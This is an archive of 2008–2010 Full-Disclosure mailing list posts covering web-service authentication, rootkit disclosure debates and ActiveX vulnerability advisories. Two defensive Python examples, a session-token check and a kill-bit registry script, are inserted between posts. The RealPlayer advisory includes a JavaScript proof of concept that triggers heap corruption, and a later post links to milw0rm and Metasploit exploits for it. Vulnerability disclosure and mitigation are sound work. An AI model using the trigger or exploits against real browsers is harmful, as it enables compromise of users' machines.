>A response from their technical support on the issue went like
>this:
>
>"The issue is on our backend server who stores the registrations,
>some ES appliances got licences resetted. The exact cause is still
>being analized with high priority. In those cases entering the
>mysonicwall credentials or uploading file solve the issue. Kind
>Regards Ivan"
>
>And as of now, their license server is **still** off-line:
>
>$ telnet licensemanager.sonicwall.com 443
>Trying 204.212.170.143...
>telnet: Unable to connect to remote host: Connection refused
>
>DRM schemes like this only cause problems for the LEGITIMATE
>customers.


Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security

2008-12-02 Thread Elazar Broad

On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad <[EMAIL PROTECTED]>
wrote:
>Mike C wrote:
>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad <[EMAIL PROTECTED]>
>> wrote:
>>
>>> and how does making a color based on these inputs protect
>>> people?
>>>
>>
>> Once all desktops have an icon or widget (say at the right hand
>> corner) with the color, and this is consistently seen everywhere,
>> the users will start associating it with their online security.
>> They will be reminded that they have to be careful with the data
>> they share.
>>
>> This, if implemented correctly, will be a boon to the security
>> industry, where the weakest links currently are 'n00b' users.
>>
>you are joking right?
>
>So some widget is going to stop the next SMB remote or IE client
>side and protect the 'n00b' users? Please explain how this works.
>Also please explain how "they will be reminded that they have to be
>careful with the data they share." has anything to do with
>protecting a user's machine from being compromised.

That's the whole point. There is a fine line between using visual
alerts to put people (Joe Six-pack) into a state of "awareness" (more
like mild hysteria) of a threat versus knowing how to protect
oneself against that threat and using that awareness indicator as
the kick in the ass to get moving and shore up the defenses (hell,
how many security folk do this too; then again, every time
something goes bump we see red). Visual alerts are great as
persuasion tools, especially when the goal is to get Joe to buy
your latest all-in-one-will-make-your-coffee-and-buy-you-beer
AV/Malware/Spyware/Foo (what's this doing here?)/evil monkey in the
closet package. So of course, Joe will never learn how to properly
defend his computer/data, and the "industry" will prosper.

Now, thanks to our good friends over at the DHS, the color system
has turned into a complete and utter joke (for the most part), so my
friend, you see, this is a complete exercise in futility (besides the
fact that every friggin' AV/IDS/Security/SIM company out there has
red, yellow and green as their corporate "flag"; if you are just
joining the party, then you can completely ignore this).

If you really want to change the state of security for the n00bs,
spread the knowledge, not the colors.

My .02...

elazar



Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad

Unless you wrap your service methods with some form of
authentication, your web services are just as public as any other
"world"-accessible part of your site. Are the pages calling these
services behind any sort of authentication?

On Thu, 06 May 2010 01:44:07 -0400 Ed Carp  wrote:
>We've got a lot of jQuery code that calls back-end web services,
>and we're worried about exposing the web services to the outside
>world - anyone can "view source" and see exactly how we're calling
>our web services.
>
>Are there any suggestions or guidelines regarding protecting one's
>source from such disclosure?  Thanks in advance!
>


Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad

If his users are authenticated via, say, a regular form login, he can
pass some sort of hash which identifies the user and session to the
service, with the authentication wrapper being server side, which
begs the question: do you trust your users...

How would such a firewall work/help anyway? It still has to make
some sort of authorization decision, and if the services in
question are not called by pages that are login protected, you're
back to square one. How do you pass some sort of 'I know this is
the page calling me and not the attacker' without the client seeing
that too?

elazar

On Thu, 06 May 2010 13:46:08 -0400 T Biehn  wrote:
>A proxy or 'web-service firewall' prior to the 'protected' web
>service is the correct answer.
>
>Obfuscating the client code, be it JavaScript, interpreted (Java,
>CLR, etc) or native, ignores the notion that the client controls the
>hardware, OS, the executing process and the network.
>
>Signals can be intercepted at any layer.
>
>Any other assertion is ridiculous and a waste of time and effort.
>
>-Travis
>
>
>
>--
>FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>http://pastebin.com/f6fd606da
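The server-side authentication wrapper Elazar describes in this thread (a token that identifies the user and session, checked on the server before any service method runs), written out as an added example; this is not code from the thread or from any project mentioned in it. It assumes a constructed server secret, a constructed session table and a constructed per-method role list; a deployment would keep the secret in server configuration and the sessions in its session store. The point it makes is the one made above: the calling page's source is public, so nothing in the page can prove "this is the page calling me"; what the wrapper trusts is the session the server itself issued, and that secret never leaves the server.

```python
import hashlib
import hmac
import time
from typing import Dict, Optional, Tuple

# Constructed server-side secret (assumption): lives only on the server and is
# never shipped to the browser, so "view source" reveals nothing usable.
SERVER_SECRET = b"constructed-demo-secret-replace-in-deployment"

# Constructed session store (assumption): real deployments use the web
# framework's session store or a database. Expiry is a Unix timestamp.
SESSIONS: Dict[str, dict] = {
    "sess-1001": {"user": "alice", "roles": {"reader"}, "expires": 4102444800},
}

# Constructed per-method role requirements (assumption): which roles may
# call which back-end service method.
SERVICE_ACL: Dict[str, set] = {
    "getReport": {"reader", "admin"},
    "deleteReport": {"admin"},
}


def issue_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Return an opaque token: session id plus an HMAC-SHA256 tag over it.

    The browser stores and echoes this value; it cannot mint a valid one
    for another session without the server secret.
    """
    tag = hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()
    return f"{session_id}.{tag}"


def verify_token(token: str, secret: bytes = SERVER_SECRET,
                 now: Optional[float] = None) -> Optional[dict]:
    """Return the session record for a valid, unexpired token, else None."""
    now = time.time() if now is None else now
    session_id, sep, tag = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison: a plain == would leak the tag byte by byte.
    if not hmac.compare_digest(tag, expected):
        return None
    session = SESSIONS.get(session_id)
    if session is None or session["expires"] <= now:
        return None
    return session


def authorize_service_call(method: str, headers: Dict[str, str],
                           now: Optional[float] = None) -> Tuple[int, str]:
    """Wrapper run before every service method; returns (HTTP status, text).

    Knowing the call shape from the page source grants nothing: each call is
    checked against the session the server issued and that session's roles.
    """
    session = verify_token(headers.get("X-Session-Token", ""), now=now)
    if session is None:
        return 401, "authentication required"
    allowed = SERVICE_ACL.get(method)
    if allowed is None:
        return 404, "unknown method"
    if not session["roles"] & allowed:
        return 403, "forbidden"
    return 200, f"ok: {method} for {session['user']}"


if __name__ == "__main__":
    token = issue_token("sess-1001")
    print(authorize_service_call("getReport", {"X-Session-Token": token}))
    print(authorize_service_call("deleteReport", {"X-Session-Token": token}))
    print(authorize_service_call("getReport", {}))
```

The token carries no secret of its own, only the session id and a tag the server can recompute; a copied token is as good as a stolen session cookie, which is why it belongs in an HttpOnly cookie or an authenticated header over TLS rather than in page source, and why the expiry check matters.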


[Full-disclosure] round and round they go

2008-02-21 Thread Elazar Broad
http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html



[Full-disclosure] Move Networks Quantum Streaming Player UploadLogs() Buffer Overflow

2008-02-25 Thread Elazar Broad

Who:
Move Networks
http://www.movenetworks.com/

What:
Move Networks is a streaming media provider whose clients include
Fox, ABC, ESPN etc. They employ an ActiveX control to display
content in the client's browser.

How:
qsp2ie07074039.dll version 7.7.4.39(digitally signed Tuesday,
September 18, 2007 7:10:35PM)
{E473A65C-8087-49A3-AFFD-C5BC4A10669B}

The url parameter of the UploadLogs() method is vulnerable to a
buffer overflow.

Workaround:
Set the killbit for this control, see
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Will be posted on milw0rm.com

Elazar


[Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-03-09 Thread Elazar Broad

Who:
Real Networks
http://www.real.com

What:
Real Networks Real Player is a popular media player.

How:
Real Player utilizes an ActiveX control to play content within the
user's browser.

rmoc3260.dll version 6.0.10.45
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}

It is possible to modify heap blocks after they are freed and
overwrite certain registers, possibly allowing code execution. Like
so:

- 
var buf = '';
while (buf.length < 1005) buf = buf + 'A';

m = obj.Console;
obj.Console = buf;
obj.Console = m

//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- -

Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Working on it

Elazar
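The kill-bit workaround that both the Move Networks advisory and the RealPlayer advisory above point to (KB240797), as an added example; this is not code from the advisories or from Microsoft. KB240797 documents the mechanism: a CLSID listed under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility whose "Compatibility Flags" DWORD has bit 0x400 set is never instantiated by Internet Explorer, and on 64-bit Windows the 32-bit browser reads the same key under SOFTWARE\Wow6432Node. The CLSIDs are the ones from the two advisories; the script's structure (CLSID validation, merging the bit into an existing value rather than overwriting it, emitting a .reg file, and a read-back that only runs on Windows) is my own.

```python
import re
import sys
from typing import Dict, Iterable, Optional

# Kill bit per KB240797: IE refuses to instantiate a control whose
# "Compatibility Flags" value has this bit set.
KILL_BIT = 0x00000400

SUBKEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
# 32-bit IE on 64-bit Windows reads the WOW64-redirected copy of the key.
SUBKEY_WOW64 = r"SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"

# CLSIDs from the two advisories on this page.
ADVISORY_CLSIDS = [
    "{E473A65C-8087-49A3-AFFD-C5BC4A10669B}",  # Move Networks qsp2ie07074039.dll
    "{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}",  # RealPlayer rmoc3260.dll
    "{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}",  # RealPlayer rmoc3260.dll
]

_CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$",
                       re.IGNORECASE)


def is_valid_clsid(clsid: str) -> bool:
    """Reject anything that is not a braced GUID before it reaches the registry."""
    return bool(_CLSID_RE.match(clsid))


def killbit_set(flags: Optional[int]) -> bool:
    """True when an existing Compatibility Flags value already has the kill bit."""
    return bool(flags) and bool(flags & KILL_BIT)


def merged_flags(existing: Optional[int]) -> int:
    """OR the kill bit into the existing value so other flags are kept."""
    return (existing or 0) | KILL_BIT


def build_killbit_reg(clsids: Iterable[str],
                      existing: Optional[Dict[str, int]] = None) -> str:
    """Return .reg text that sets the kill bit for each CLSID (both key paths).

    `existing` maps CLSID -> current Compatibility Flags (e.g. from
    read_flags()); when given, the bit is merged instead of overwriting.
    """
    known = {k.upper(): v for k, v in (existing or {}).items()}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        if not is_valid_clsid(clsid):
            raise ValueError(f"not a CLSID: {clsid!r}")
        clsid = clsid.upper()
        value = merged_flags(known.get(clsid))
        for subkey in (SUBKEY, SUBKEY_WOW64):
            lines.append(f"[HKEY_LOCAL_MACHINE\\{subkey}\\{clsid}]")
            lines.append(f'"Compatibility Flags"=dword:{value:08x}')
            lines.append("")
    return "\n".join(lines)


def read_flags(clsid: str, subkey: str = SUBKEY) -> Optional[int]:
    """Windows only: current Compatibility Flags for a CLSID, or None if absent.

    Returns None on other platforms so the rest of the module stays usable
    for generating the .reg file offline.
    """
    if not sys.platform.startswith("win") or not is_valid_clsid(clsid):
        return None
    import winreg  # only importable on Windows
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{subkey}\\{clsid}") as key:
            value, _ = winreg.QueryValueEx(key, "Compatibility Flags")
            return int(value)
    except OSError:
        return None


if __name__ == "__main__":
    current = {c: read_flags(c) for c in ADVISORY_CLSIDS}
    pending = [c for c, f in current.items() if not killbit_set(f)]
    print(build_killbit_reg(pending, {c: f for c, f in current.items() if f}))
```

Run it on the affected machine and import the printed .reg file with administrative rights; the read-back step keeps any flags the vendor or an earlier update already placed on the CLSID, which a bare `dword:00000400` import would silently discard.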


Re: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game

2008-04-01 Thread Elazar Broad

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<[EMAIL PROTECTED]> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>   AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit Corporation
>has announced the 4.0 release of their flag-ship product, The
>Metasploit Framework.  The new release comes jam-packed with
>exciting features that are sure to please even the German legal
>system.  The following brief list includes some of the more
>fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user
>interfaces you've come to expect from exploitation frameworks?
>Seeing a command shell for the 5000th time got you down?  Well,
>you're in luck.  Metasploit has decided to return to its rootz in
>'08 and focus on the exploitation-as-a-game model.  PwnCraft brings
>the worlds of ownage and pwnage together for the first time in a
>revolutionary Real Time Strategy (RTS) world.  Don't be fooled by
>the game-like interface, though!  The actions you take in PwnCraft
>have a real effect on the world around you!  Here's just a taste of
>some of the absolutely insane features you can look forward to:
>
>  - Glide through enemy networks with a squadron of elegant winged
>    pwnies
>  - Launch devastating attacks against enemy ports in an all-out
>    IPS-evading TCP/IP assault
>  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in
>    enemy defenses
>  - Conquer cities and install agents who can sabotage and smuggle
>    other units to new Vistas
>  - An entirely in-game interface to the vulnerability sharing
>    market to improve your arsenal on the fly!
>  - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping to
>begin releasing it in stores at a retail price of $49.99 in Q3 2009.
>More details about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing position
>a final decision has been made to "screw it" and move the framework
>to a closed source license agreement.  The decision was made to sell
>out for a number of reasons, not the least of which has to do with
>the benjamins.  Metasploit 2.x and 3.x will no longer be available
>for public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At
>Me service that delivers exploits on demand.  You can rest assured
>that Metasploit's Sploit At Me service will attempt to compromise
>machines of your choosing with *99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of
>non-paying customers world-wide.  Metasploit delivers high-quality,
>top-notch, success-driven exploits to the security world as a
>one-stop-shop exploitation framework.
>
>
>  * The other 1% of the time, your own machine will be
>    compromised.


Re: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-04-01 Thread Elazar Broad

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_console.rb

Elazar


On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>user's browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution. Like
>so:
>
>
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-
>
>Workaround:
>Set the killbit for this control. See
>http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar


Re: [Full-disclosure] [NANOG] IOS rootkits

2008-05-18 Thread Elazar Broad

Keep in mind that rootkit functionality itself isn't all bad; take
anti-virus software for example. It's like a shark trawling the
bottom of the sea floor, looking up at its next meal on high; how
deeply can you hook the OS core...

Elazar

On Sun, 18 May 2008 14:45:48 -0400 Kurt Dillard
<[EMAIL PROTECTED]> wrote:
>Apparently Gadi doesn't understand either.  Rootkits don't need to
>exploit vulnerabilities in an OS, they leverage the design of the OS
>or the underlying hardware platform. You don't 'patch' the design of
>something. You want to stop rootkits in IOS? Don't allow it to run
>arbitrary code, run the OS in firmware rather than from writable
>storage. Go study up on rootkits for a few weeks before you complain
>about someone demonstrating one. Unlike you guys I happen to know
>what I am talking about as I've been studying malware including
>rootkits for over 10 years. By studying I mean taking them apart,
>figuring out how they work, and finding tools to deal with them; not
>reading some half-assed article on CNET or Ziff-Davis full of
>technical errors.
>
>Over the past few years Cisco, Apple, and Oracle have behaved an
>awful lot like Microsoft did 10 years ago, trying to pretend that
>their platforms are immune to malware and refusing to approach
>vulnerabilities head-on with an attitude of rational pragmatism.
>Dave Litchfield and his team have dragged Oracle kicking and
>screaming to the world of reality; the same has yet to happen with
>the other two firms.
>
>-Original Message-
>From: [EMAIL PROTECTED]
>[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
>Sent: Sunday, May 18, 2008 12:50 PM
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] [NANOG] IOS rootkits
>
>On Sun, May 18, 2008 at 4:37 PM, Kurt Dillard
><[EMAIL PROTECTED]> wrote:
>> NETDOVE,
>> Obviously you have no idea how a rootkit works much less how to
>> defend against them, your rants make no sense.
>>
>> Kurt
>
>Dude,
>
>Gadi Evron is punching into this guy as well, check this out:
>
>-- Forwarded message --
>From: Gadi Evron <[EMAIL PROTECTED]>
>Date: Sun, May 18, 2008 at 3:48 PM
>Subject: Re: [NANOG] IOS rootkits
>To: Dragos Ruiu <[EMAIL PROTECTED]>
>Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
>[EMAIL PROTECTED]
>
>
>On Sun, 18 May 2008, Dragos Ruiu wrote:
>>
>> On 17-May-08, at 3:12 AM, Suresh Ramasubramanian wrote:
>>
>>> On Sat, May 17, 2008 at 12:47 PM, Matthew Moyle-Croft
>>> <[EMAIL PROTECTED]> wrote:
>>>> If the way of running this isn't out in the wild and it's
>>>> actually dangerous then a pox on anyone who releases it,
>>>> especially to gain publicity at the expense of network operators'
>>>> sleep and well-being.
>>>> May you never find a reliable route ever again.
>>>
>>> This needs fixing. It doesn't need publicity at security
>>> conferences till after Cisco gets presented this stuff first and
>>> asked to release an emergency patch.
>>
>> Bullshit.
>>
>> There is nothing to patch.
>>
>> It needs to be presented at conferences, exactly because people
>> will play ostrich and stick their heads in the sand and pretend it
>> can't happen to them, and do nothing about it until someone shows
>> them, "yes it can happen" and here is how.
>>
>> Which is exactly why we've accepted this talk. We've all known this
>> is a possibility for years, but I haven't seen significant motion
>> forward on this until we announced this talk. So in a fashion, this
>> has already helped make people more realistic about their
>> infrastructure devices. And the discussions, and idea interchange
>> that will happen between the smart folks at the conference will
>> undoubtedly usher forth other related issues and creative
>> solutions.  Problems don't get fixed until you talk about them.
>
>Dragos, while I hold full disclosure very close and it is dear to my
>heart, I admit the fact that it can be harmful. Let me link that to
>network operations.
>
>People forget history. A few years back I had a chat with Aleph1 on
>the first days of bugtraq. He reminded me how things are not always
>black and white.
>
>Full disclosure, while preferable in my ideology, is not the best
>solution for all. One of the reasons bugtraq was created is because
>vendors did not care about security, not to mention have a
>capability to handle security issues, or avoid them to begin with.
>
>Full disclosure made a lot of progress for us, and while still a
>useful tool, with some vendors it has become far more useful to
>report to them and let them provide a solution first.
>
>In the case of routers which are used for infrastructure as well as
>critical infrastructure, it is my strong belief that full disclosure
>is, at least at face value, a bad idea.
>
>I'd like to think Cisco, which has shown capability in the past, is
>as responsible as it should be on these issues. Experience tells me
>they have a ways to go yet ev

Re: [Full-disclosure] Geeks

2008-05-19 Thread Elazar Broad
Yea, and there are plenty that can't even set up their own home
network...

On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]> 
wrote:
>> CISSP's cant hack
>
>Huh?
>
>There are plenty of CISSPs you wouldn't want on your bad side. 
>They just decided to grow up and  make a legitimate living. It 
>simply creates a 'standard' by which companies can use to gauge a 
>person's understanding is at a base level.
>
>They also learned how to use spell check and form a proper 
>sentence that one does not have to read three times to understand.
>
>
>
>- Original Message 
>From: wilder_jeff Wilder <[EMAIL PROTECTED]>
>To: Morning Wood <[EMAIL PROTECTED]>; n3td3v 
><[EMAIL PROTECTED]>; full-disclosure@lists.grok.org.uk
>Sent: Monday, May 19, 2008 8:58:26 AM
>Subject: Re: [Full-disclosure] Geeks
>
> The CISSP is a management certification... not a techie cert... I 
>dont need to hack to keep one out..
> 
>
>
>-Jeff
>
>
>
>-BEGIN GEEK CODE BLOCK-
>Version: 3.1
>GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--
>V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++
>G e* h--- r- y+++*
>--END GEEK CODE BLOCK--
>
>> From: [EMAIL PROTECTED]
>> To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
>> Date: Thu, 15 May 2008 09:11:37 -0700
>> Subject: Re: [Full-disclosure] Geeks
>> 
>> >> Anybody who thinks a CISSP is a "license to hack" is 
>dreadfully ignorant
>> >> of what little overlap there is between hacking skills and 
>the material
>> >> covered in the CISSP.
>> 
>> CISSPs can't hack
>> 
>> 
>> 
>> Donnie Werner ( not a ) CISSP
>> http://exploitlabs.com
>> 
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/




Re: [Full-disclosure] Need some help with management

2008-05-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

It's not even funny how often this happens. I have a friend who does
some consulting work for small businesses, and the number of times
that he has come across medical practices that run their billing
and record keeping software on the same "fully-loaded" XP box that
their receptionist(s) use to download random crap...

E

On Fri, 23 May 2008 11:24:29 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Thursday, May 22, 2008 20:45:06 -0700 coderman
><[EMAIL PROTECTED]> wrote:
>
>> On Thu, May 22, 2008 at 9:51 AM, Daniel Sichel
><[EMAIL PROTECTED]>
>> wrote:
>>> My management here wants to put a server on our LAN, not
>>> administered by us
>>> ...
>>
>> all of the responses to this are retarded.
>>
>> tell him to setup a server.  dare him. double dog dare!
>>
>> when it pings, load it full of goatse.cx and tubgurl and
>> lemonparty.
>>
>> ask, "do you want to run AND SECURE your own server?"
>>
>> case closed.
>>
>
>You clearly don't work anywhere near an enterprise.  If you did,
>you'd realize this very scenario occurs almost on a daily basis and
>the "owners" are perfectly happy with their dreg-filled completely
>insecure "servers" running on Windows XP SP1.
>
>--
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>




Re: [Full-disclosure] AppScan and IDS evasion

2008-05-24 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The out of the box ruleset for SmartDefense on the FW1 does some
basic string checking on web traffic (i.e. checking GET and POST
variables for SQL injection and XSS, etc.) along with some strict
RFC checks, I don't know to what extent though...

Elazar

On Sat, 24 May 2008 10:46:43 -0400 Roman Medina-Heigl Hernandez
<[EMAIL PROTECTED]> wrote:
>Pen Testing wrote:
>
>> I've launched AppScan against a web application and I'm being
>> blocked/banned (since I have a dynamic IP I can reboot my router
>> and get another IP, which is shortly banned again, as long as the
>> attack persists). Since AppScan doesn't have any kind of IDS
>> evasion (AFAIK), what could I do?
>
>Are you using the default template/policy? Perhaps you could edit
>it and/or create a new (and more relaxed) one by disabling
>potentially detectable checks... No idea about which checks you
>should eliminate...
>
>> PS: I don't know which kind of IDS is in use (perhaps it's not a
>> full-IDS but some anomaly detection as the one included in
>> Checkpoint FW-1 but I don't have that information).
>
>Any of you have more info about the kind of checks FW1 use?
>
>--
>
>Saludos,
>-Roman
>
>PGP Fingerprint:
>09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
>[Key ID: 0xEAD56742. Available at KeyServ]
>



Re: [Full-disclosure] Need some help with management

2008-05-25 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yup, CCEs and default configurations/passwords are definitely quite
common. The folks over at gnucitizen have been hitting on this for
some time with their work on the BT Home Hub...

Elazar

On Fri, 23 May 2008 12:16:45 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Friday, May 23, 2008 11:56:15 -0400 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> It's not even funny how often this happens. I have a friend who
>> does some consulting work for small businesses, and the number of
>> times that he has come across medical practices that run their
>> billing and record keeping software on the same "fully-loaded" XP
>> box that their receptionist(s) use to download random crap...
>>
>
>Typical scenario - professor runs Windows XP with Skype and Google
>Toolbar and a host of other "helpful" desktop applications - oh, but
>that's his "server" too - running IIS and mysql - default installs,
>mind you - replete with cross-site scripting and sql injection
>problems - and all his research with no backups - and then gets
>irate because his computer gets blocked at the switch port for
>policy violations.
>
>I could go on, but you get the idea.
>
>Why do they do it?  Because they can - at least until we catch
>them.
>
>How many mysql installs do you think there are worldwide, listening
>on the default port, with "[EMAIL PROTECTED]", "[EMAIL PROTECTED]",
>"@localhost" and "@FQHN" all in the default state with no password?
>
>--
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>




[Full-disclosure] Autodesk Security Contact

2008-06-16 Thread Elazar Broad
Does anyone have a security contact for Autodesk?

elazar




Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

2008-07-04 Thread Elazar Broad
"We are an impatient lot in this community." - well said...

On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux" 
<[EMAIL PROTECTED]> wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclosure. We only received this information a few days ago.
>>
>> Regards,
>>
>> -- Pedro Bustamante, Senior Research Advisor, Panda Security
>
>It takes a week to hit the "respond" button? At least be polite
>and read your mail, perhaps with a quick "stand by, we're looking
>into it" response so folks think you care.
>
>We are an impatient lot in this community.
>
>
>




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-08 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

They ain't called beltway bandits for nothing...

On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
<[EMAIL PROTECTED]> wrote:
>Ivan, all,
>
>Hold the phone...$5k-$7k to fix an infected device!?  Really?
>HOLY CRAP... either that's a completely made-up "FUD" figure, or the
>government contractors are making *way* too much money off my taxes.
>
>__
>Rafal M. Los
>IT Security - Response | Mitigation | Strategy
>
>E-mail:  [EMAIL PROTECTED]
> - Blog: http://preachsecurity.blogspot.com
>
>--
>From: "Ivan ." <[EMAIL PROTECTED]>
>Sent: Monday, December 08, 2008 5:14 PM
>To: "Full-Disclosure mailing list" [EMAIL PROTECTED]>
>Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar,
>Commission Says
>
>>
>> http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm
>>
>>
>




Re: [Full-disclosure] We're letting the bad guys win

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Brilliant use of deflection, keep it up, you might end up as some
loser serial rapist on Law and Order, oh wait, they want actors,
not the real thing...

On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Dec 9, 2008 at 3:08 PM, Paul Schmehl
><[EMAIL PROTECTED]> wrote:
>> --On Tuesday, December 09, 2008 00:25:18 -0600
>> [EMAIL PROTECTED] wrote:
>>
>>>
>>> On Tue, 09 Dec 2008 04:03:57 GMT, n3td3v said:
>>>> We need to stop this back and forth fighting, it's making
>>>> infosec look bad, this isn't what infosec should be about.
>>>
>>> It's making one very small insignificant corner of infosec look
>>> bad.
>>>
>>> Let's keep a sense of perspective, guys.
>>
>> Or, to look at it another way, it's tying up all the idiots in
>> one place and keeping the rest of infosec unsullied.  :-)
>>
>
>I agree,
>But full-disclosure shouldn't be full of idiots so why do we let
>it be that way. It's because we reply to them that it happens. I
>was gullible and naive to reply to them, I'm not replying to them
>anymore.
>




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think most of us realize that even with the hard work of many
good people in and out of the security industry this country's
cyber security amounts to some swiss cheese, and there is plenty of
blame to go around. Let's face it though, no one thinks that by
failing to properly secure their computer and/or information they
could possibly be aiding our terrorist friends. For one, there have
been links between funding for various groups and carding.
Changing the public opinion and mindset might go a long way,
especially if it's something like "your credit card could be funding
the next 911", that's just a thought though. As for those who have
been there, done that, all your work isn't for naught. I may not
like his tax plan, but Obama definitely is headed in the right
direction by appointing a CTO for this country as well as taking
cyber security seriously. It's about damned time!

On Tue, 09 Dec 2008 01:13:44 -0500 James Matthews
<[EMAIL PROTECTED]> wrote:
>They are trying to get the government to do something about it.
>But unless they see the danger not just hear about it nothing will
>happen.
>
>Consider remarks before Congress last year by O. Sami Saydjari,
>CEO of Cyber Defense Agency <http://www.cyberdefenseagency.com/>, a
>security research and consulting firm, and a former official at the
>Defense Dept.'s research arm, DARPA. Following a major cyber-attack,
>he told legislators, electricity, banking, and communications could
>all go dead, leaving Americans scrounging for food, water,
>gasoline—even hunks of firewood traded on the black market.
>
>
>On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> They ain't called beltway bandits for nothing...
>>
>> On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
>> <[EMAIL PROTECTED]> wrote:
>> >Ivan, all,
>> >
